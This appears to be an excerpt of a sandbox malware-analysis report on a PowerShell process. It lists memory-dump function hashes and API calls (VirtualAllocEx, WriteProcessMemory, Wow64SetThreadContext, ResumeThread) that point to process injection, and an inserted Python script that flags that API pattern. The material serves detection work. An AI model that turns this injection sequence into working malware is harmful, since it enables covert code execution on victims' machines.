                                                  control_flow_graph: serialized basic-block and edge data behind the Control-flow Graph visualization (executed/not-executed colouring not reproduced here). Blocks span 4ae6198-4ae64e6, with calls to 4ae5334, 4aef0df and 4aef1d8.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: SjP
                                                  • API String ID: 0-1466192239
                                                  • Opcode ID: 48b9a999a8b24e2281a20a0ec01c322018a7050172ec15007aed8b431a09b288
                                                  • Instruction ID: 48cddb4d26a654ce3ca3775a4576a4890d6709eceaef500348869b699fc1bc6a
                                                  • Opcode Fuzzy Hash: 48b9a999a8b24e2281a20a0ec01c322018a7050172ec15007aed8b431a09b288
                                                  • Instruction Fuzzy Hash: ADA112B4E01208DFDB04DFA9D499AAEBBF2FF88300F249029D525A7385DB756945CF80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E>I
                                                  • API String ID: 0-3352654960
                                                  • Opcode ID: 2f403c28475803f6a1b7c69d3973ff390863a66550065814ad00f342ca187b7f
                                                  • Instruction ID: c438514a1d641a579e97b3ad57c0cd936100ef37024c7b530133e1f2a9bfe552
                                                  • Opcode Fuzzy Hash: 2f403c28475803f6a1b7c69d3973ff390863a66550065814ad00f342ca187b7f
                                                  • Instruction Fuzzy Hash: EE8129B4E00208DFDB44DF69D945BADBBF2FB49310F5080AAD819AB391DB396945CF10
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E>I
                                                  • API String ID: 0-3352654960
                                                  • Opcode ID: 62c5f50a538f7dd906f023d863a4d66ba60b0592a24c28ca2caf5dc02fd8f04f
                                                  • Instruction ID: 9b3f492baa5c7c07d38c4c16a43f5d2124ce8dc5f6039f598e2b0efdda9718c3
                                                  • Opcode Fuzzy Hash: 62c5f50a538f7dd906f023d863a4d66ba60b0592a24c28ca2caf5dc02fd8f04f
                                                  • Instruction Fuzzy Hash: B5811AB4A40208DFDB44DF69D549BADB7F2FB58310F4081A9E81AAB391DB39A944CF00
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E>I
                                                  • API String ID: 0-3352654960
                                                  • Opcode ID: 385847e95037567a87d516f337d5f55bca9cf3289399ba08bf17f71785d937aa
                                                  • Instruction ID: dd779b39dbc7a1619cdee3100dcead00a05ec8c3a9131cfbee022d083849df3f
                                                  • Opcode Fuzzy Hash: 385847e95037567a87d516f337d5f55bca9cf3289399ba08bf17f71785d937aa
                                                  • Instruction Fuzzy Hash: 0D810AB4E40208DFDB44DF69D559BADBBF2FB48310F5081A9D81AAB391DB39A945CF00
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E>I
                                                  • API String ID: 0-3352654960
                                                  • Opcode ID: 04ed7ab61e0e2d2557c30bdade8ad095305f5de1af6f8e777e2406e4ce716103
                                                  • Instruction ID: bf3ea27acd29579df5641e20a8eccd5e125d844e671dac4d8e4496c2ba9bbc14
                                                  • Opcode Fuzzy Hash: 04ed7ab61e0e2d2557c30bdade8ad095305f5de1af6f8e777e2406e4ce716103
                                                  • Instruction Fuzzy Hash: 88813974A00208DFDB44DF69D945BADBBF2FB49310F5080A9D919AB391DB396985CF10
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E>I
                                                  • API String ID: 0-3352654960
                                                  • Opcode ID: 829c09327c3aeadf31a5a8c948b54acac36c041b5020d51b7832828aed9e6284
                                                  • Instruction ID: 2a69258f9c42961b8e3d4ca4e14240fd107f0dfa021cdf3567589c9ecae0294a
                                                  • Opcode Fuzzy Hash: 829c09327c3aeadf31a5a8c948b54acac36c041b5020d51b7832828aed9e6284
                                                  • Instruction Fuzzy Hash: 74712B74A00208DFDB44DF69D959BADB7F6FB48310F4080A9D91AAB391DB39A984CF10
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E>I
                                                  • API String ID: 0-3352654960
                                                  • Opcode ID: cbdecaa90e1301dbc9b5f3fafd329b1d9b62bae1c5cd764c46ecc58ae149cdc4
                                                  • Instruction ID: 395190ab295e88523cf4c856ba5f8379380936351282f053c9e45c72da0bccdb
                                                  • Opcode Fuzzy Hash: cbdecaa90e1301dbc9b5f3fafd329b1d9b62bae1c5cd764c46ecc58ae149cdc4
                                                  • Instruction Fuzzy Hash: 06612AB4A40218DFDB44DF69D949BADB7F2FB48310F4081A9D81AEB391DB39A945CF10

                                                  Control-flow Graph

                                                  • Graph rendering omitted; entry block 79708f8-797091a, no API calls in this function
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2283191494.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7970000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (o]q$(o]q$4']q$4']q$4']q$4']q
                                                  • API String ID: 0-3265970930
                                                  • Opcode ID: 9ed155c26ff7c8920985c634c9cfa62264600f5407359ae2b3eb50ae8012348a
                                                  • Instruction ID: b5c7184b6ea83daeb407c5c9a8d318827d84ea861c7c841892927c27e1a0363f
                                                  • Opcode Fuzzy Hash: 9ed155c26ff7c8920985c634c9cfa62264600f5407359ae2b3eb50ae8012348a
                                                  • Instruction Fuzzy Hash: 6FF139B0B04309DFDB188F6DC8447AABBAAFF85318F14C47AE4598B250DB71D941CBA1

                                                  Control-flow Graph

                                                  • Graph rendering omitted; entry block 797036d-7970370, no API calls in this function
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2283191494.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7970000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$$]q$$]q$$]q
                                                  • API String ID: 0-2353078639
                                                  • Opcode ID: 15a8fd3cde776de1ed434dbebdd549decd916a3c546970d5f338a818d28431b3
                                                  • Instruction ID: d5c84f14631aa2f6f441b72d40732cd6049da9207728f37667e4f8a367a6a5be
                                                  • Opcode Fuzzy Hash: 15a8fd3cde776de1ed434dbebdd549decd916a3c546970d5f338a818d28431b3
                                                  • Instruction Fuzzy Hash: A64126F17182068FDB284A3D95223BAB7D9AF8121CF248876C851CB395FF76C945C3A1

                                                  Control-flow Graph

                                                  • Graph rendering omitted; entry block 79707e7-79707ff, no API calls in this function
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2283191494.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7970000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  • Opcode ID: 7edf42907ce07ff11f0646c71eba61fcc7a57a7655f07b773d07a05194691550
                                                  • Instruction ID: 2ad65649b1ccc10c09ab9cf60ad9a44819611a0a7b1dac4090319d4c14afb07d
                                                  • Opcode Fuzzy Hash: 7edf42907ce07ff11f0646c71eba61fcc7a57a7655f07b773d07a05194691550
                                                  • Instruction Fuzzy Hash: 43E0D871B0424D8EDF285BAC95602E97BA5FF82514F11489AC491C7156D7368805C7E2

                                                  Control-flow Graph

                                                  • Graph rendering omitted; entry block 7131b9d-7131c41, CreateProcessA called from block 7131d94-7131e8a
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07131E77
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 0525940994abd9bdc5e03a8b91a77b0be98d41e3d9d551bee45418b6e6fea804
                                                  • Instruction ID: eb5a513c60c51a184337293510763bef972d014884a63de9ca9e17528457b272
                                                  • Opcode Fuzzy Hash: 0525940994abd9bdc5e03a8b91a77b0be98d41e3d9d551bee45418b6e6fea804
                                                  • Instruction Fuzzy Hash: 3AC126B1D0062D9FDB25CFA8C844BEDBBB1BF49304F0091A9D859B7290DB749A85DF81

                                                  Control-flow Graph

                                                  • Graph rendering omitted; entry block 7131ba8-7131c41, CreateProcessA called from block 7131d94-7131e8a
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07131E77
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 694a235a92ad6d211bc3cd3509bbc7daa91febecb3070223b0524ccfea8cf3a5
                                                  • Instruction ID: c81e935c136c1885cde5bd0a8ce7c046f9b0f47097c20facf8a53a8823463fe0
                                                  • Opcode Fuzzy Hash: 694a235a92ad6d211bc3cd3509bbc7daa91febecb3070223b0524ccfea8cf3a5
                                                  • Instruction Fuzzy Hash: F0C136B1D0062D9FDB25CFA8C844BEDBBB1BF49304F0091A9D859B7290DB749A85DF81

                                                  Control-flow Graph

                                                  • Graph rendering omitted; entry block 713181b-713188b, WriteProcessMemory called from block 71318a2-7131903
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 071318F3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 7b344382f03a8a537e57607b5de31386e1e1a33f674024f05b13a0b0a3aed671
                                                  • Instruction ID: 2529930236f2f6355a9ce4a191f73306ea770dd35633c8202bbd47ee7cdd9815
                                                  • Opcode Fuzzy Hash: 7b344382f03a8a537e57607b5de31386e1e1a33f674024f05b13a0b0a3aed671
                                                  • Instruction Fuzzy Hash: 674198B5D012589FCF00CFA9D984AEEFBF1BB49310F24942AE419B7250C739AA45CB64

                                                  Control-flow Graph

                                                  • Graph rendering omitted; entry block 7131820-713188b, WriteProcessMemory called from block 71318a2-7131903
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 071318F3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 9d610c73fd3ee03e1c106dcae52a470078388d325adc4da65b578b2d75014163
                                                  • Instruction ID: bcda48cb1481807a12f5fb8090fbebd333961ce1b2a9f04f4768107dfb2a2b39
                                                  • Opcode Fuzzy Hash: 9d610c73fd3ee03e1c106dcae52a470078388d325adc4da65b578b2d75014163
                                                  • Instruction Fuzzy Hash: 4E419AB5D012589FCF00CFA9D984AEEFBF1BB49310F14902AE419B7250D738AA45CF64

                                                  Control-flow Graph

                                                  • Graph rendering omitted; entry block 7131700-71317ba, VirtualAllocEx called from the entry block
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 071317AA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 46fa0a58cd47abafd81d2eaa1112cc7ccc26e2481dae1038d1dd39f0782c6454
                                                  • Instruction ID: b2b9a44de0d9618feb3c14ab5261e3953ced2470e3a7a9271c77fb097240eb8e
                                                  • Opcode Fuzzy Hash: 46fa0a58cd47abafd81d2eaa1112cc7ccc26e2481dae1038d1dd39f0782c6454
                                                  • Instruction Fuzzy Hash: AC31A8B9D00258AFCF10CFA9D980ADEFBB1FB49310F14942AE815B7210D735A946CFA4

                                                  Control-flow Graph

                                                  • Graph rendering omitted; entry block 71315d0-7131638, Wow64SetThreadContext called from block 713164f-7131697
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 07131687
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 9589a6192f83d2793afbbe9fab636057a0d196699ca71082a11bec912682b419
                                                  • Instruction ID: 9c461b941a44f5020abc472d6bfd4b977bbcb36ff3c9e418c0dcfeeb4c389bcc
                                                  • Opcode Fuzzy Hash: 9589a6192f83d2793afbbe9fab636057a0d196699ca71082a11bec912682b419
                                                  • Instruction Fuzzy Hash: 5041C0B5D012189FCB10DFAAD584AEEFBF1BF49310F14802AE415B7240C778A985CF94

                                                  Control-flow Graph

                                                  • Graph rendering omitted; entry block 71316fb-71317ba, VirtualAllocEx called from the entry block
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 071317AA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 3e50640f8716763be30af25c98332dfb2ea54004ac2abac1506d2c4879c15e36
                                                  • Instruction ID: 5042c6e3d625619137b360e0c26ad216b8bd2f17efcee4acaf0eed297e8f67a8
                                                  • Opcode Fuzzy Hash: 3e50640f8716763be30af25c98332dfb2ea54004ac2abac1506d2c4879c15e36
                                                  • Instruction Fuzzy Hash: DD3176B9D00258AFCF10CFA9D980ADEFBB1BB59310F14942AE815B7250D735A946CFA4

                                                  Control-flow Graph

Control-flow graph (rendered graph omitted): block 71315d8-7131638 has edges to 713163a-713164c and to 713164f-7131697, which calls Wow64SetThreadContext (713163a-713164c also continues into it); after the call, edges go to 7131699-713169f and 71316a0-71316ec, the former continuing to the latter.
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 07131687
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 695b23945b1ff514ce2fa00d46fd4eb015638dde7ff639f7864066873f4a9653
                                                  • Instruction ID: fc21d900997158d16ccde8dc175b6eab7c526769d7df803395bfe31e69a9331f
                                                  • Opcode Fuzzy Hash: 695b23945b1ff514ce2fa00d46fd4eb015638dde7ff639f7864066873f4a9653
                                                  • Instruction Fuzzy Hash: 9531CDB5D012589FCB14DFAAD984AEEFBF5BF49310F14802AE419B7240C778A985CF94

                                                  Control-flow Graph

Control-flow graph (rendered graph omitted): block 71301b1-7130246 calls ResumeThread and has edges to 7130248-713024e and 713024f-7130291; 7130248-713024e continues to 713024f-7130291.
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: f73ddad8f54fd124ba7373dd84004a5d0d3346949ca938ae8a16cb5d9456607d
                                                  • Instruction ID: 56ff8a1cb3b437ec676ee806c06c5fd91f9dc23d1cd0cebe9f6ca1ad7a503c39
                                                  • Opcode Fuzzy Hash: f73ddad8f54fd124ba7373dd84004a5d0d3346949ca938ae8a16cb5d9456607d
                                                  • Instruction Fuzzy Hash: C831BEB5D012189FCF14CFA9D585AEEFBB5AF49310F10942AE419B7250C735A841CFA4

                                                  Control-flow Graph

Control-flow graph (rendered graph omitted): block 71301b8-7130246 calls ResumeThread and has edges to 7130248-713024e and 713024f-7130291; 7130248-713024e continues to 713024f-7130291 (same successor blocks as the 71301b1 variant above, differing only in entry address).
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 595af0a4b1aecb5d7f6aebde13c1c442c73eaae2cc0ad72bd401a541883eaffd
                                                  • Instruction ID: 27c65b444d7fb0e7ccef21929a59bd9b553c7f3961d476222922ea6f83551dac
                                                  • Opcode Fuzzy Hash: 595af0a4b1aecb5d7f6aebde13c1c442c73eaae2cc0ad72bd401a541883eaffd
                                                  • Instruction Fuzzy Hash: A831A9B4D012189FCF14CFAAD984AAEFBF5AF49310F14942AE819B7250C735A941CFA4
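The four functions above from the 0x07130000 region of the PowerShell process (VirtualAllocEx, Wow64SetThreadContext and two ResumeThread variants that differ only in entry address) are the API combination of a suspended-thread injection stub: allocate in the target, overwrite the thread context, resume. The Python below is an added example, not part of the Joe Sandbox report, that parses this section's entry layout, groups called APIs by memory-dump offset, flags dumps whose functions together allocate, set a context and resume, and compares Instruction Fuzzy Hashes. The API grouping lists and the positional nibble-agreement similarity are assumptions of this example (Joe Sandbox's own similarity score is not documented on this page); the sample text is a constructed excerpt of the entries shown above with the Opcode/Instruction ID lines dropped.

```python
import re
from collections import defaultdict

# Constructed excerpt of the entries above, in the report's own field layout.
# Hashes, offsets and ref addresses are copied from this page; no other data is real.
SAMPLE = """\
APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 071317AA
Memory Dump Source
• Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
• API ID: AllocVirtual
• Instruction Fuzzy Hash: DD3176B9D00258AFCF10CFA9D980ADEFBB1BB59310F14942AE815B7250D735A946CFA4
APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 07131687
Memory Dump Source
• Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
• API ID: ContextThreadWow64
• Instruction Fuzzy Hash: 9531CDB5D012589FCB14DFAAD984AEEFBF5BF49310F14802AE419B7240C778A985CF94
APIs
Memory Dump Source
• Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
• API ID: ResumeThread
• Instruction Fuzzy Hash: C831BEB5D012189FCF14CFA9D585AEEFBB5AF49310F10942AE419B7250C735A841CFA4
APIs
Memory Dump Source
• Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
• API ID: ResumeThread
• Instruction Fuzzy Hash: A831A9B4D012189FCF14CFAAD984AAEFBF5AF49310F14942AE819B7250C735A941CFA4
Memory Dump Source
• Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
• API ID:
• Instruction Fuzzy Hash: DA228F74A012489FCB05CFA9C494AAEFFB5FF89310F15819AE455AB365C735EC81CB90
"""

API_CALL = re.compile(r"^•\s*(\w+)\.(\w+)\(.*\),\s*ref:\s*([0-9A-Fa-f]+)")
FIELD = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
OFFSET = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")

# Assumed triage lists for a suspended-thread injection stub (not defined by the report).
ALLOC = {"VirtualAllocEx", "NtAllocateVirtualMemory", "ZwAllocateVirtualMemory"}
SET_CTX = {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}
RESUME = {"ResumeThread", "NtResumeThread"}


def parse_entries(text):
    """Split report text into per-function dicts; 'Instruction Fuzzy Hash' closes an entry."""
    entries, cur = [], {"apis": [], "api_id": "", "offset": None, "ihash": ""}
    for raw in text.splitlines():
        line = raw.strip()
        call = API_CALL.match(line)
        if call:                                   # '• Api.DLL(args), ref: addr'
            cur["apis"].append((call.group(1), call.group(2), call.group(3)))
            continue
        field = FIELD.match(line)
        if not field:
            continue
        key, value = field.group(1), field.group(2).strip()
        if key == "Source File":
            found = OFFSET.search(value)
            cur["offset"] = found.group(1).upper() if found else None
        elif key == "API ID":
            cur["api_id"] = value
        elif key == "Instruction Fuzzy Hash":
            cur["ihash"] = value.upper()
            entries.append(cur)
            cur = {"apis": [], "api_id": "", "offset": None, "ihash": ""}
    return entries


def apis_by_dump(entries):
    """Map dump offset -> API names seen in functions carved from that dump.

    Entries with no 'APIs' line (the two ResumeThread functions) fall back to
    'API ID'; that field is a word-sorted form for some entries (AllocVirtual),
    so it is used only when no real call line exists.
    """
    seen = defaultdict(set)
    for e in entries:
        if e["offset"] is None:
            continue
        names = {api for api, _dll, _ref in e["apis"]}
        if not names and e["api_id"]:
            names.add(e["api_id"])
        seen[e["offset"]] |= names
    return seen


def flag_injection(seen):
    """Dump offsets whose functions together allocate, set a thread context and resume."""
    return {off for off, names in seen.items()
            if names & ALLOC and names & SET_CTX and names & RESUME}


def nibble_similarity(h1, h2):
    """Fraction of positions at which two equal-length hex hashes agree (assumed heuristic)."""
    if not h1 or len(h1) != len(h2):
        return 0.0
    return sum(a == b for a, b in zip(h1.upper(), h2.upper())) / len(h1)


def near_duplicates(entries, threshold=0.8):
    """(api_id, api_id, score) for entry pairs whose hashes agree at >= threshold of positions."""
    pairs = []
    for i in range(len(entries)):
        for j in range(i + 1, len(entries)):
            score = nibble_similarity(entries[i]["ihash"], entries[j]["ihash"])
            if score >= threshold:
                pairs.append((entries[i]["api_id"], entries[j]["api_id"], round(score, 3)))
    return pairs


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    by_dump = apis_by_dump(parsed)
    hits = flag_injection(by_dump)
    for off, names in sorted(by_dump.items()):
        print(off, sorted(names), "INJECTION-PATTERN" if off in hits else "")
    print("near-duplicate functions:", near_duplicates(parsed))
```

Run against the whole report text instead of SAMPLE and the dump that holds the injector stub surfaces immediately; on this excerpt the two ResumeThread functions score as near-duplicates while the VirtualAllocEx and Wow64SetThreadContext functions do not, which matches the shared block ranges in their control-flow graphs.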
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2283191494.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7970000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tP]q
                                                  • API String ID: 0-2175968468
                                                  • Opcode ID: 61dc6a8688bef4a88ce742030fcbe040f4bc3189611e679d8c84f171cb601248
                                                  • Instruction ID: 985f03d826784ca0464e6f027b48d96a9757b3a4abe9db150de247fc9080f687
                                                  • Opcode Fuzzy Hash: 61dc6a8688bef4a88ce742030fcbe040f4bc3189611e679d8c84f171cb601248
                                                  • Instruction Fuzzy Hash: FA415671649385AFC7128B54C892AA9BFB1EFC6314F19849BD584CF292C7329C46C7B2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b5300edc835f950092f18f6f8a20d295d97b714eea07838feedb1bb2f2988fa
                                                  • Instruction ID: bcf413fed98ffa27a47da210cbd495780b913560e7fedcff4315d2707d6177b7
                                                  • Opcode Fuzzy Hash: 1b5300edc835f950092f18f6f8a20d295d97b714eea07838feedb1bb2f2988fa
                                                  • Instruction Fuzzy Hash: DA228F74A012489FCB05CFA9C494AAEFFB5FF89310F15819AE455AB365C735EC81CB90
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ff3adbce6842f063ae7c5bee99aa52e259ba432bb938c202a8d8863e714921fb
                                                  • Instruction ID: e69984cc9d298897720569da4541621ddecf658fe10abd650e9c0055f7f79fe7
                                                  • Opcode Fuzzy Hash: ff3adbce6842f063ae7c5bee99aa52e259ba432bb938c202a8d8863e714921fb
                                                  • Instruction Fuzzy Hash: 97029F30A052589FCB05DFA9D8909AEBFF2FF89310F158596E854AB362C735EC45CB90
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 16897f8631277dca13d1ed166208faa08c6180cacd5b6ef0a3c839e254de5b90
                                                  • Instruction ID: 1c0974977f908824ee997a2bc9d2ab188c2cccd01840c198bdc7088cbdcb33a8
                                                  • Opcode Fuzzy Hash: 16897f8631277dca13d1ed166208faa08c6180cacd5b6ef0a3c839e254de5b90
                                                  • Instruction Fuzzy Hash: B8B10674A00218AFDB14CFA9D594AADFBF2BF88310F24C159E815AB355C735ED86CB90
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a8475a2b999a65e869cd6918f5b500e0d5ea8a1b3e2e76c6099f3fb72d58b68
                                                  • Instruction ID: b9db2296be60033503c7e92bace9620b165703572128553baa2d0cd7a5e0af79
                                                  • Opcode Fuzzy Hash: 8a8475a2b999a65e869cd6918f5b500e0d5ea8a1b3e2e76c6099f3fb72d58b68
                                                  • Instruction Fuzzy Hash: DD51C2319093944FCB06DF6DC8A08EABFF1AF4A32471946D7D890DB2A3D224EC45C7A5
                                                  Memory Dump Source
